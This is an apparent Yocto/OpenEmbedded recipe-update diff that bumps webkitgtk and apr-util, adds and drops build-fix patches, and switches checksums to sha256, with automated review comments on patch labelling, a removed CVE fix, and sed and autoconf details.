@@ -5,6 +5,7 @@ terminal emulator rxvt, modified to store text in Unicode \
5(either UCS-2 or UCS-4) and to use locale-correct input and \ 5(either UCS-2 or UCS-4) and to use locale-correct input and \
6output. It also supports mixing multiple fonts at the \ 6output. It also supports mixing multiple fonts at the \
7same time, including Xft fonts." 7same time, including Xft fonts."
8HOMEPAGE = "https://rxvt.org/"
8DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu" 9DEPENDS = "virtual/libx11 libxt libxft gdk-pixbuf libxmu"
9 10
10SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \ 11SRC_URI = "http://dist.schmorp.de/rxvt-unicode/Attic/rxvt-unicode-${PV}.tar.bz2 \
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
new file mode 100644
index 0000000000..f10dca09d6
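--- /dev/null
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch
@@ -0,0 +1,30 @@
+From 9a8f1d73e7b7e183768a8379ef32429a84f0e5c2 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Feb 2021 18:11:56 -0800
+Subject: [PATCH] libev: remove deprecated throw specification
+
+removes the throw specifications that are deprecated since C++11:
+warning: dynamic exception specifications are deprecated in C++11 [-Wdeprecated]
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ libev/ev++.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libev/ev++.h b/libev/ev++.h
+index 4f0a36a..85ddf44 100644
+--- a/libev/ev++.h
++++ b/libev/ev++.h
+@@ -376,7 +376,7 @@ namespace ev {
+
+ struct default_loop : loop_ref
+ {
+- default_loop (unsigned int flags = AUTO) throw (bad_loop)
++ default_loop (unsigned int flags = AUTO)
+ #if EV_MULTIPLICITY
+ : loop_ref (ev_default_loop (flags))
+ #endif
+--
+2.30.1
+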
diff --git a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
index bfa8a614df..283e8d7751 100644
--- a/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
+++ b/meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb
@@ -4,5 +4,7 @@ LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ 4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
5 file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6" 5 file://src/main.C;beginline=1;endline=31;md5=d3600d7ee1062667fcd1193fbe6485f6"
6 6
7SRC_URI[md5sum] = "93782dec27494eb079467dacf6e48185" 7SRC_URI += "file://0001-libev-remove-deprecated-throw-specification.patch"
8
8SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd" 9SRC_URI[sha256sum] = "e94628e9bcfa0adb1115d83649f898d6edb4baced44f5d5b769c2eeb8b95addd"
10
diff --git a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
index 2b1f513f1c..7e7612253d 100644
--- a/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
+++ b/meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb
@@ -11,7 +11,7 @@ DEPENDS = "matchbox-panel-2 gtk+3"
11 11
12# SRCREV tagged 0.3 12# SRCREV tagged 0.3
13SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756" 13SRCREV = "9250fa5a012d84ff45984e8c4345ee7635227756"
14SRC_URI = "git://git.yoctoproject.org/screenshot" 14SRC_URI = "git://git.yoctoproject.org/screenshot;branch=master"
15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 15UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
16 16
17S = "${WORKDIR}/git" 17S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
index d01177f9b9..19c4a73dc3 100644
--- a/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
+++ b/meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb
@@ -9,7 +9,7 @@ SECTION = "x11"
9 9
10# SRCREV tagged 0.0.2 10# SRCREV tagged 0.0.2
11SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2" 11SRCREV = "b2e5da502f8c5ff75e9e6da771372ef8e40fd9a2"
12SRC_URI = "git://git.yoctoproject.org/xsettings-daemon \ 12SRC_URI = "git://git.yoctoproject.org/xsettings-daemon;branch=master \
13 file://addsoundkeys.patch \ 13 file://addsoundkeys.patch \
14 file://70settings-daemon.sh \ 14 file://70settings-daemon.sh \
15 " 15 "
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
new file mode 100644
index 0000000000..528dec8c8b
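--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch
@@ -0,0 +1,31 @@
+From dcf9ae0dc0b4510eddbeeea09e11edfb123f95af Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Sun, 2 May 2021 13:10:49 -0700
+Subject: [PATCH] MiniBrowser: Fix reproduciblity
+
+Do not emit references to source dir in generated sourcecode
+
+Upstream-Status: Submitted [https://bugs.webkit.org/show_bug.cgi?id=225283]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Tools/MiniBrowser/gtk/CMakeLists.txt | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Tools/MiniBrowser/gtk/CMakeLists.txt b/Tools/MiniBrowser/gtk/CMakeLists.txt
+index 93b62521..482d3b00 100644
+--- a/Tools/MiniBrowser/gtk/CMakeLists.txt
++++ b/Tools/MiniBrowser/gtk/CMakeLists.txt
+@@ -48,8 +48,8 @@ add_custom_command(
+ OUTPUT ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+ ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ MAIN_DEPENDENCY ${MINIBROWSER_DIR}/browser-marshal.list
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ VERBATIM)
+
+ if (DEVELOPER_MODE)
+--
+2.31.1
+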
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
new file mode 100644
index 0000000000..d8bb8efb88
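--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
@@ -0,0 +1,66 @@
+From cb929f59b527fe890376e47613dfe1434a320bc0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Tue, 11 Aug 2020 15:44:48 -0700
+Subject: [PATCH] [clang 11] fix build errors due to -WWc++11-narrowing
+
+https://bugs.webkit.org/show_bug.cgi?id=211193
+
+Reviewed by Adrian Perez de Castro.
+
+Fixes the following errors,
+
+Source/WebCore/html/MediaElementSession.cpp:1059:9: error: type 'WebCore::RenderMedia *' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_element.renderer(),
+^~~~~~~~~~~~~~~~~~~~
+
+Source/WebCore/style/StyleResolver.cpp:106:55: error: type 'const char [4]' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+Source/WebCore/style/StyleResolver.cpp:106:55: note: insert an explicit cast to silence this issue
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+ static_cast<bool>( )
+
+* html/HTMLMediaElement.h:
+(WebCore::HTMLMediaElement::hasRenderer const):
+MediaElementSession was implicitly casting a pointer to a bool,
+which is not allowed with modern Clang checks. Add a helper method
+to encapsulate the now required static_cast<bool>.
+* html/MediaElementSession.cpp: Use the new helper method to see
+if the HTMLMediaElement has an associated renderer.
+(WebCore::MediaElementSession::updateMediaUsageIfChanged):
+* style/StyleResolver.cpp: This was calling MediaQueryEvaluator {
+"all" }; and seemingly expecting to cast a const char[] to a bool,
+or maybe String? It's confusing because of the MediaQueryEvaluator
+API. If it was implicitly converting to bool then that could be
+unintentional. Such casts are not allowed either now. The
+MediaQueryEvaluator's default constructor says it returns true for
+"all", which appears to be the original intent of this call, so I
+replaced it with that.
+(WebCore::Style::Resolver::Resolver):
+
+git-svn-id: http://svn.webkit.org/repository/webkit/trunk@260951 268f45cc-cd09-0410-ab3c-d52691b4dbfc
+
+Upstream-Status: Backport [https://github.com/WebKit/webkit/commit/c3cf651016e4cdcb4350598d4a586821071f91bf.patch]
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Source/WebCore/style/StyleResolver.cpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Source/WebCore/style/StyleResolver.cpp b/Source/WebCore/style/StyleResolver.cpp
+index 8bf371a0..34580ddb 100644
+--- a/Source/WebCore/style/StyleResolver.cpp
++++ b/Source/WebCore/style/StyleResolver.cpp
+@@ -107,7 +107,7 @@ Resolver::Resolver(Document& document)
+ if (view)
+ m_mediaQueryEvaluator = MediaQueryEvaluator { view->mediaType() };
+ else
+- m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
++ m_mediaQueryEvaluator = MediaQueryEvaluator { };
+
+ if (root) {
+ m_rootDefaultStyle = styleForElement(*root, m_document.renderStyle(), nullptr, RuleMatchingBehavior::MatchOnlyUserAgentRules).renderStyle;
+--
+2.28.0
+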
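Review bot: The patch description lists changes to html/HTMLMediaElement.h and html/MediaElementSession.cpp (a new `hasRenderer` helper), but the diffstat and the only hunk touch `Source/WebCore/style/StyleResolver.cpp` alone, so this is a partial backport and the header does not say so. Anyone auditing the file against the upstream commit named in `Upstream-Status` will find a mismatch. I would record it in the header, e.g. `Upstream-Status: Backport [<upstream commit URL>, StyleResolver.cpp hunk only]`, and state why the other two files are left out (presumably they are not needed for this webkitgtk version; to be confirmed). Resolver::Resolver itself starts and ends outside the hunk.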
diff --git a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch b/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
deleted file mode 100644
index d8504c2b36..0000000000
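--- a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
+++ /dev/null
@@ -1,15 +0,0 @@
-Upstream-Status: Backport [https://trac.webkit.org/changeset/262368/webkit?format=diff&new=262368]
-CVE: CVE-2020-13753
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
-Index: a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp
-===================================================================
---- a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262367)
-+++ b/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262368)
-@@ -642,5 +642,5 @@
- int r;
- if (rule.arg)
-- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, rule.arg);
-+ r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, *rule.arg);
- else
- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 0);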
diff --git a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
index cf6b2ffae7..2e3f0aa682 100644
--- a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb
+++ b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
@@ -19,10 +19,10 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \
19 file://cross-compile.patch \ 19 file://cross-compile.patch \
20 file://0001-Fix-build-with-musl.patch \ 20 file://0001-Fix-build-with-musl.patch \
21 file://include_array.patch \ 21 file://include_array.patch \
22 file://CVE-2020-13753.patch \ 22 file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \
23 file://0001-MiniBrowser-Fix-reproduciblity.patch \
23 " 24 "
24SRC_URI[md5sum] = "ec0ef870ca37e3a5ebbead2f268a28ec" 25SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464"
25SRC_URI[sha256sum] = "b9d23525cfd8d22c37b5d964a9fe9a8ce7583042a2f8d3922e71e6bbc68c30bd"
26 26
27inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc 27inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc
28 28
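Review bot: `file://CVE-2020-13753.patch` is removed from SRC_URI together with the move to 2.28.4, and nothing visible in this section records that the new tarball already contains the seccomp fix the patch carried (`*rule.arg` instead of `rule.arg` in BubblewrapLauncher.cpp). If the 2.28.4 sources lack that change, the sandbox filter rule would regress without any build failure to flag it. Please confirm against the unpacked source and state it in the commit description, e.g. `Drop CVE-2020-13753.patch, the fix is included in 2.28.4`. Dropping `SRC_URI[md5sum]` while keeping an updated `SRC_URI[sha256sum]` is fine.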
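diff --git a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch b/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
deleted file mode 100644
index 57e7453312..0000000000
--- a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 6b638fa9afbeb54dfa19378e391465a5284ce1ad Mon Sep 17 00:00:00 2001
-From: Changqing Li <changqing.li@windriver.com>
-Date: Wed, 12 Sep 2018 17:16:36 +0800
-Subject: [PATCH] Fix error handling in gdbm
-
-Only check for gdbm_errno if the return value of the called gdbm_*
-function says so. This fixes apr-util with gdbm 1.14, which does not
-seem to always reset gdbm_errno.
-
-Also make the gdbm driver return error codes starting with
-APR_OS_START_USEERR instead of always returning APR_EGENERAL. This is
-what the berkleydb driver already does.
-
-Also ensure that dsize is 0 if dptr == NULL.
-
-Upstream-Status: Backport[https://svn.apache.org/viewvc?
-view=revision&amp;revision=1825311]
-
-Signed-off-by: Changqing Li <changqing.li@windriver.com>
----
- dbm/apr_dbm_gdbm.c | 47 +++++++++++++++++++++++++++++------------------
- 1 file changed, 29 insertions(+), 18 deletions(-)
-
-diff --git a/dbm/apr_dbm_gdbm.c b/dbm/apr_dbm_gdbm.c
-index 749447a..1c86327 100644
---- a/dbm/apr_dbm_gdbm.c
-+++ b/dbm/apr_dbm_gdbm.c
-@@ -36,13 +36,25 @@
- static apr_status_t g2s(int gerr)
- {
- if (gerr == -1) {
-- /* ### need to fix this */
-- return APR_EGENERAL;
-+ if (gdbm_errno == GDBM_NO_ERROR)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
- }
-
- return APR_SUCCESS;
- }
-
-+static apr_status_t gdat2s(datum d)
-+{
-+ if (d.dptr == NULL) {
-+ if (gdbm_errno == GDBM_NO_ERROR || gdbm_errno == GDBM_ITEM_NOT_FOUND)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
-+ }
-+
-+ return APR_SUCCESS;
-+}
-+
- static apr_status_t datum_cleanup(void *dptr)
- {
- if (dptr)
-@@ -53,22 +65,15 @@ static apr_status_t datum_cleanup(void *dptr)
-
- static apr_status_t set_error(apr_dbm_t *dbm, apr_status_t dbm_said)
- {
-- apr_status_t rv = APR_SUCCESS;
-
-- /* ### ignore whatever the DBM said (dbm_said); ask it explicitly */
-+ dbm->errcode = dbm_said;
-
-- if ((dbm->errcode = gdbm_errno) == GDBM_NO_ERROR) {
-+ if (dbm_said == APR_SUCCESS)
- dbm->errmsg = NULL;
-- }
-- else {
-- dbm->errmsg = gdbm_strerror(gdbm_errno);
-- rv = APR_EGENERAL; /* ### need something better */
-- }
--
-- /* captured it. clear it now. */
-- gdbm_errno = GDBM_NO_ERROR;
-+ else
-+ dbm->errmsg = gdbm_strerror(dbm_said - APR_OS_START_USEERR);
-
-- return rv;
-+ return dbm_said;
- }
-
- /* --------------------------------------------------------------------------
-@@ -107,7 +112,7 @@ static apr_status_t vt_gdbm_open(apr_dbm_t **pdb, const char *pathname,
- NULL);
-
- if (file == NULL)
-- return APR_EGENERAL; /* ### need a better error */
-+ return APR_OS_START_USEERR + gdbm_errno; /* ### need a better error */
-
- /* we have an open database... return it */
- *pdb = apr_pcalloc(pool, sizeof(**pdb));
-@@ -141,10 +146,12 @@ static apr_status_t vt_gdbm_fetch(apr_dbm_t *dbm, apr_datum_t key,
- if (pvalue->dptr)
- apr_pool_cleanup_register(dbm->pool, pvalue->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pvalue->dsize = 0;
-
- /* store the error info into DBM, and return a status code. Also, note
- that *pvalue should have been cleared on error. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_store(apr_dbm_t *dbm, apr_datum_t key,
-@@ -201,9 +208,11 @@ static apr_status_t vt_gdbm_firstkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-@@ -221,9 +230,11 @@ static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static void vt_gdbm_freedatum(apr_dbm_t *dbm, apr_datum_t data)
---
-2.7.4
-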
diff --git a/meta/recipes-support/apr/apr-util_1.6.1.bb b/meta/recipes-support/apr/apr-util_1.6.3.bb
index f7d827a1d8..3d9d619c7b 100644
--- a/meta/recipes-support/apr/apr-util_1.6.1.bb
+++ b/meta/recipes-support/apr/apr-util_1.6.3.bb
@@ -13,11 +13,9 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.gz \
13 file://configfix.patch \ 13 file://configfix.patch \
14 file://configure_fixes.patch \ 14 file://configure_fixes.patch \
15 file://run-ptest \ 15 file://run-ptest \
16 file://0001-Fix-error-handling-in-gdbm.patch \ 16 "
17"
18 17
19SRC_URI[md5sum] = "bd502b9a8670a8012c4d90c31a84955f" 18SRC_URI[sha256sum] = "2b74d8932703826862ca305b094eef2983c27b39d5c9414442e9976a9acf1983"
20SRC_URI[sha256sum] = "b65e40713da57d004123b6319828be7f1273fbc6490e145874ee1177e112c459"
21 19
22EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \ 20EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
23 --without-odbc \ 21 --without-odbc \
@@ -35,6 +33,7 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
35do_configure_append() { 33do_configure_append() {
36 if [ "${CLASSOVERRIDE}" = "class-target" ]; then 34 if [ "${CLASSOVERRIDE}" = "class-target" ]; then
37 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk 35 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk
36 sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${B}/build/rules.mk
38 fi 37 fi
39} 38}
40do_configure_prepend_class-native() { 39do_configure_prepend_class-native() {
@@ -49,6 +48,7 @@ do_configure_append_class-native() {
49 48
50do_configure_prepend_class-nativesdk() { 49do_configure_prepend_class-nativesdk() {
51 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk 50 cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk
51 sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${S}/build/rules.mk
52} 52}
53 53
54do_configure_append_class-nativesdk() { 54do_configure_append_class-nativesdk() {
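Review bot: The two added `sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g'` calls (in `do_configure_append` and `do_configure_prepend_class-nativesdk`) carry no comment saying why the CFLAGS line of the copied `apr_rules.mk` has to be overwritten. They also splice `${TARGET_CFLAGS}` unescaped into a sed script that uses `#` as its delimiter, so a flag value containing `#` or `&` would break or silently alter the substitution; that is unlikely for compiler flags but worth stating. I would add above each call something like `# rules.mk is copied from the apr sysroot; replace its recorded CFLAGS with this recipe's flags`, with the actual motivation filled in by the author since it is not visible here.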
diff --git a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
index abff4e9331..a274f3a16e 100644
--- a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
+++ b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
@@ -1,14 +1,15 @@
1From 2bbe20b4f69e84e7a18bc79d382486953f479328 Mon Sep 17 00:00:00 2001 1From 225abf37cd0b49960664b59f08e515a4c4ea5ad0 Mon Sep 17 00:00:00 2001
2From: Jeremy Puhlman <jpuhlman@mvista.com> 2From: Jeremy Puhlman <jpuhlman@mvista.com>
3Date: Thu, 26 Mar 2020 18:30:36 +0000 3Date: Thu, 26 Mar 2020 18:30:36 +0000
4Subject: [PATCH] Add option to disable timed dependant tests 4Subject: [PATCH] Add option to disable timed dependant tests
5 5
6The disabled tests rely on timing to pass correctly. On a virtualized 6The disabled tests rely on timing to pass correctly. On a virtualized
7system under heavy load, these tests randomly fail because they miss 7system under heavy load, these tests randomly fail because they miss
8a timer or other timing related issues. 8a timer or other timing related issues.
9 9
10Upstream-Status: Pending 10Upstream-Status: Pending
11Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com> 11Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
12
12--- 13---
13 configure.in | 6 ++++++ 14 configure.in | 6 ++++++
14 include/apr.h.in | 1 + 15 include/apr.h.in | 1 +
@@ -16,10 +17,10 @@ Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
16 3 files changed, 9 insertions(+), 2 deletions(-) 17 3 files changed, 9 insertions(+), 2 deletions(-)
17 18
18diff --git a/configure.in b/configure.in 19diff --git a/configure.in b/configure.in
19index d9f32d6..f0c5661 100644 20index bfd488b..3663220 100644
20--- a/configure.in 21--- a/configure.in
21+++ b/configure.in 22+++ b/configure.in
22@@ -2886,6 +2886,12 @@ AC_ARG_ENABLE(timedlocks, 23@@ -3023,6 +3023,12 @@ AC_ARG_ENABLE(timedlocks,
23 ) 24 )
24 AC_SUBST(apr_has_timedlocks) 25 AC_SUBST(apr_has_timedlocks)
25 26
@@ -45,10 +46,10 @@ index ee99def..c46a5f4 100644
45 #define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@ 46 #define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@
46 47
47diff --git a/test/testlock.c b/test/testlock.c 48diff --git a/test/testlock.c b/test/testlock.c
48index a43f477..6233d0b 100644 49index e3437c1..04e01b9 100644
49--- a/test/testlock.c 50--- a/test/testlock.c
50+++ b/test/testlock.c 51+++ b/test/testlock.c
51@@ -396,13 +396,13 @@ abts_suite *testlock(abts_suite *suite) 52@@ -535,7 +535,7 @@ abts_suite *testlock(abts_suite *suite)
52 abts_run_test(suite, threads_not_impl, NULL); 53 abts_run_test(suite, threads_not_impl, NULL);
53 #else 54 #else
54 abts_run_test(suite, test_thread_mutex, NULL); 55 abts_run_test(suite, test_thread_mutex, NULL);
@@ -56,6 +57,8 @@ index a43f477..6233d0b 100644
56+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS 57+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
57 abts_run_test(suite, test_thread_timedmutex, NULL); 58 abts_run_test(suite, test_thread_timedmutex, NULL);
58 #endif 59 #endif
60 abts_run_test(suite, test_thread_nestedmutex, NULL);
61@@ -543,7 +543,7 @@ abts_suite *testlock(abts_suite *suite)
59 abts_run_test(suite, test_thread_rwlock, NULL); 62 abts_run_test(suite, test_thread_rwlock, NULL);
60 abts_run_test(suite, test_cond, NULL); 63 abts_run_test(suite, test_cond, NULL);
61 abts_run_test(suite, test_timeoutcond, NULL); 64 abts_run_test(suite, test_timeoutcond, NULL);
@@ -63,7 +66,4 @@ index a43f477..6233d0b 100644
63+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS 66+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
64 abts_run_test(suite, test_timeoutmutex, NULL); 67 abts_run_test(suite, test_timeoutmutex, NULL);
65 #endif 68 #endif
66 #endif 69 #ifdef WIN32
67--
682.23.0
69
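diff --git a/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
new file mode 100644
index 0000000000..a78b16284f
--- /dev/null
+++ b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
@@ -0,0 +1,58 @@
+From 316b81c462f065927d7fec56aadd5c8cb94d1cf0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Aug 2022 00:28:08 -0700
+Subject: [PATCH] configure: Remove runtime test for mmap that can map
+ /dev/zero
+
+This never works for cross-compile moreover it ends up disabling
+ac_cv_file__dev_zero which then results in compiler errors in shared
+mutexes
+
+Upstream-Status: Inappropriate [Cross-compile specific]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+
+---
+ configure.in | 30 ------------------------------
+ 1 file changed, 30 deletions(-)
+
+diff --git a/configure.in b/configure.in
+index 3663220..dce9789 100644
+--- a/configure.in
++++ b/configure.in
+@@ -1303,36 +1303,6 @@ AC_CHECK_FUNCS([mmap munmap shm_open shm_unlink shmget shmat shmdt shmctl \
+ APR_CHECK_DEFINE(MAP_ANON, sys/mman.h)
+ AC_CHECK_FILE(/dev/zero)
+
+-# Not all systems can mmap /dev/zero (such as HP-UX). Check for that.
+-if test "$ac_cv_func_mmap" = "yes" &&
+- test "$ac_cv_file__dev_zero" = "yes"; then
+- AC_CACHE_CHECK([for mmap that can map /dev/zero],
+- [ac_cv_mmap__dev_zero],
+- [AC_TRY_RUN([#include <sys/types.h>
+-#include <sys/stat.h>
+-#include <fcntl.h>
+-#ifdef HAVE_SYS_MMAN_H
+-#include <sys/mman.h>
+-#endif
+- int main()
+- {
+- int fd;
+- void *m;
+- fd = open("/dev/zero", O_RDWR);
+- if (fd < 0) {
+- return 1;
+- }
+- m = mmap(0, sizeof(void*), PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+- if (m == (void *)-1) { /* aka MAP_FAILED */
+- return 2;
+- }
+- if (munmap(m, sizeof(void*)) < 0) {
+- return 3;
+- }
+- return 0;
+- }], [], [ac_cv_file__dev_zero=no], [ac_cv_file__dev_zero=no])])
+-fi
+-
+ # Now we determine which one is our anonymous shmem preference.
+ haveshmgetanon="0"
+ havemmapzero="0"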
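Review bot: Deleting the whole `AC_CACHE_CHECK([for mmap that can map /dev/zero]` block also removes the check for builds that are not cross-compiled, where the run test can execute. The cross-compile problem described in the patch header appears to come only from the last `AC_TRY_RUN` argument, `[ac_cv_file__dev_zero=no]`. Changing just that argument so the cross case keeps the existing value, e.g. `}], [], [ac_cv_file__dev_zero=no], [:])])`, would leave behaviour unchanged where the test can run and might be acceptable upstream rather than `Inappropriate`. As written, the outcome rests on `AC_CHECK_FILE(/dev/zero)` or on an `ac_cv_file__dev_zero` value cached by the build.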
